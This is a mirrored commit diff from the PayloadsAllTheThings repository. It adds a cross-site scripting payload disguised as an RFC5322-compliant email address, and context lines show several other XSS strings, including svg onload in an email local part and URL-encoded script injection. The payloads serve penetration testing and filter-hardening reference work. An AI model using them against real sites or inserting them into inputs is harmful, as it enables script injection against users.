mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add additional XSS payload in email addresses RFC5322
This commit is contained in:
parent
b5251a673f
commit
fcf69f8226
@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
|
|||||||
"><svg/onload=confirm(1)>"@x.y
|
"><svg/onload=confirm(1)>"@x.y
|
||||||
```
|
```
|
||||||
|
|
||||||
|
([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
xss@example.com(<img src='x' onerror='alert(document.location)'>)
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass document blacklist
|
### Bypass document blacklist
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
@ -1405,4 +1411,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
|||||||
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
|
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
|
||||||
- [Bypass < with <](https://hackerone.com/reports/639684)
|
- [Bypass < with <](https://hackerone.com/reports/639684)
|
||||||
- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
|
- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
|
||||||
- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)
|
- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)
|
||||||
|
Loading…
Reference in New Issue
Block a user